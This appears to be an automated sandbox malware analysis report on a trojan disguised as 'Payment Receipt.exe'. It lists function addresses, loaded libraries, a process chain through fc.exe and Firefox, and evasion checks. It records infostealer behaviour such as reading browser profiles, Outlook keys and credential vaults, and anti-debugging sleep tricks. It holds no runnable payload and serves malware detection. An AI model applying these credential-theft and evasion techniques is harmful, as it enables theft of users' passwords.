              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D5CC4_2_0322D5CC
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03235C774_2_03235C77
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D47B4_2_0322D47B
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D47C4_2_0322D47C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03235C7C4_2_03235C7C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322D4804_2_0322D480
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0322F49C4_2_0322F49C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AA3525_2_030AA352
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B03E65_2_030B03E6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFE3F05_2_02FFE3F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030902745_2_03090274
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030702C05_2_030702C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308A1185_2_0308A118
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030781585_2_03078158
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B01AA5_2_030B01AA
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A41A25_2_030A41A2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A81CC5_2_030A81CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030820005_2_03082000
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE01005_2_02FE0100
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030147505_2_03014750
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEC7C05_2_02FEC7C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF07705_2_02FF0770
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300C6E05_2_0300C6E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B05915_2_030B0591
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030944205_2_03094420
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A24465_2_030A2446
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF05355_2_02FF0535
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309E4F65_2_0309E4F6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AAB405_2_030AAB40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEEA805_2_02FEEA80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A6BD75_2_030A6BD7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FD68B85_2_02FD68B8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030069625_2_03006962
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030BA9A65_2_030BA9A6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF28405_2_02FF2840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFA8405_2_02FFA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF29A05_2_02FF29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0301E8F05_2_0301E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03032F285_2_03032F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03010F305_2_03010F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03092F305_2_03092F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03064F405_2_03064F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF0E595_2_02FF0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0306EFA05_2_0306EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AEE265_2_030AEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE2FC85_2_02FE2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03002E905_2_03002E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030ACE935_2_030ACE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AEEDB5_2_030AEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE0CF25_2_02FE0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308CD1F5_2_0308CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03008DBF5_2_03008DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF0C005_2_02FF0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEADE05_2_02FEADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03090CB55_2_03090CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFAD005_2_02FFAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A132D5_2_030A132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF52A05_2_02FF52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0303739A5_2_0303739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FDD34C5_2_02FDD34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300B2C05_2_0300B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030912ED5_2_030912ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300D2F05_2_0300D2F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF70C05_2_02FF70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030BB16B5_2_030BB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0302516C5_2_0302516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFB1B05_2_02FFB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FDF1725_2_02FDF172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309F0CC5_2_0309F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A70E95_2_030A70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF0E05_2_030AF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF7B05_2_030AF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030356305_2_03035630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A16CC5_2_030A16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A75715_2_030A7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE14605_2_02FE1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308D5B05_2_0308D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B95C35_2_030B95C3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF43F5_2_030AF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFB765_2_030AFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300FB805_2_0300FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03065BF05_2_03065BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0302DBF95_2_0302DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFA495_2_030AFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A7A465_2_030A7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03063A6C5_2_03063A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03035AA05_2_03035AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308DAAC5_2_0308DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03091AA35_2_03091AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309DAC65_2_0309DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030859105_2_03085910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF38E05_2_02FF38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300B9505_2_0300B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0305D8005_2_0305D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF99505_2_02FF9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFF095_2_030AFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF9EB05_2_02FF9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFFB15_2_030AFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB3FD25_2_02FB3FD2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB3FD55_2_02FB3FD5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF1F925_2_02FF1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A1D5A5_2_030A1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A7D735_2_030A7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300FDC05_2_0300FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03069C325_2_03069C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF3D405_2_02FF3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFCF25_2_030AFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00811FD05_2_00811FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080CE805_2_0080CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B0805_2_0080B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080D0A05_2_0080D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B07F5_2_0080B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B1C45_2_0080B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B1D05_2_0080B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008011E75_2_008011E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008156805_2_00815680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008138805_2_00813880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081387B5_2_0081387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0082BCD05_2_0082BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E2F55_2_02E5E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E7B35_2_02E5E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E4135_2_02E5E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E57B5_2_02E5E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5CB135_2_02E5CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5D8785_2_02E5D878
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 6_2_050D42236_2_050D4223
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D10357B7_2_0000022E9D10357B
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1028787_2_0000022E9D102878
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1037B37_2_0000022E9D1037B3
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1034137_2_0000022E9D103413
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1032F57_2_0000022E9D1032F5
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D101B137_2_0000022E9D101B13
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0305EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02FDB970 appears 265 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03025130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0306F290 appears 103 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03037E54 appears 107 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0162F290 appears 103 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0159B970 appears 262 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 015F7E54 appears 107 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 015E5130 appears 58 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0161EA12 appears 86 times
              Source: Payment Receipt.exe Static PE information: No import functions for PE file found
              Source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000002.2016615336.0000000001841000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.1926428067.0000000001326000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.1928236553.00000000014EC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.2016351170.0000000001128000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFC.EXEj% vs Payment Receipt.exe
              Source: Payment Receipt.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Payment Receipt.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Payment Receipt.exe Static PE information: Section .text
              Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/1@14/10
              Source: C:\Windows\SysWOW64\fc.exe File created: C:\Users\user\AppData\Local\Temp\17O3k-2I
              Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\Desktop\Payment Receipt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: fc.exe, 00000005.00000002.4097379677.0000000002C1D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Payment Receipt.exe Virustotal: Detection: 62%
              Source: Payment Receipt.exe ReversingLabs: Detection: 71%
              Source: unknown Process created: C:\Users\user\Desktop\Payment Receipt.exe "C:\Users\user\Desktop\Payment Receipt.exe"
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Users\user\Desktop\Payment Receipt.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: ieframe.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netapi32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: mlang.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: winsqlite3.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\fc.exe Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: wininet.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\fc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
              Source: C:\Windows\SysWOW64\fc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
              Source: Payment Receipt.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MEREhDqMRRNSzT.exe, 00000004.00000000.1941108983.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097025395.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Payment Receipt.exe, Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: Payment Receipt.exe Static PE information: section name: .text entropy: 7.995279909719649
              Source: C:\Windows\SysWOW64\fc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Payment Receipt.exe Code function: 0_2_015E096E rdtsc 0_2_015E096E
              Source: C:\Windows\SysWOW64\fc.exe Window / User API: threadDelayed 4491
              Source: C:\Windows\SysWOW64\fc.exe Window / User API: threadDelayed 5482
              Source: C:\Users\user\Desktop\Payment Receipt.exe API coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exe API coverage: 2.6 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676 Thread sleep count: 4491 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676 Thread sleep time: -8982000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676 Thread sleep count: 5482 > 30
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676 Thread sleep time: -10964000s >= -30000s
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924 Thread sleep time: -75000s >= -30000s
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924 Thread sleep count: 34 > 30
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924 Thread sleep time: -51000s >= -30000s
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924 Thread sleep count: 39 > 30
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924 Thread sleep time: -39000s >= -30000s
              Source: C:\Windows\SysWOW64\fc.exe Last function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exe Code function: 5_2_0081C870 FindFirstFileW,FindNextFileW,FindClose, 5_2_0081C870
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4097526393.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
              Source: fc.exe, 00000005.00000002.4097379677.0000000002B60000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000007.00000002.2304400822.0000022E9D28C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
              Source: C:\Users\user\Desktop\Payment Receipt.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Payment Receipt.exe Process queried: DebugPort
              Source: C:\Windows\SysWOW64\fc.exe Process queried: DebugPort
              Source: C:\Users\user\Desktop\Payment Receipt.exe Code function: 0_2_00747CA3 LdrLoadDll, 0_2_00747CA3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA5D0 mov eax, dword ptr fs:[00000030h]0_2_015DA5D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DA5D0 mov eax, dword ptr fs:[00000030h]0_2_015DA5D0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE5CF mov eax, dword ptr fs:[00000030h]0_2_015DE5CF
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE5CF mov eax, dword ptr fs:[00000030h]0_2_015DE5CF
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC5ED mov eax, dword ptr fs:[00000030h]0_2_015DC5ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DC5ED mov eax, dword ptr fs:[00000030h]0_2_015DC5ED
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A25E0 mov eax, dword ptr fs:[00000030h]0_2_015A25E0
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015CE5E7 mov eax, dword ptr fs:[00000030h]0_2_015CE5E7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015DE59C mov eax, dword ptr fs:[00000030h]0_2_015DE59C
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016205A7 mov eax, dword ptr fs:[00000030h]0_2_016205A7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016205A7 mov eax, dword ptr fs:[00000030h]0_2_016205A7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_016205A7 mov eax, dword ptr fs:[00000030h]0_2_016205A7
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015D4588 mov eax, dword ptr fs:[00000030h]0_2_015D4588
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A2582 mov eax, dword ptr fs:[00000030h]0_2_015A2582
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A2582 mov ecx, dword ptr fs:[00000030h]0_2_015A2582
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015C45B1 mov eax, dword ptr fs:[00000030h]0_2_015C45B1
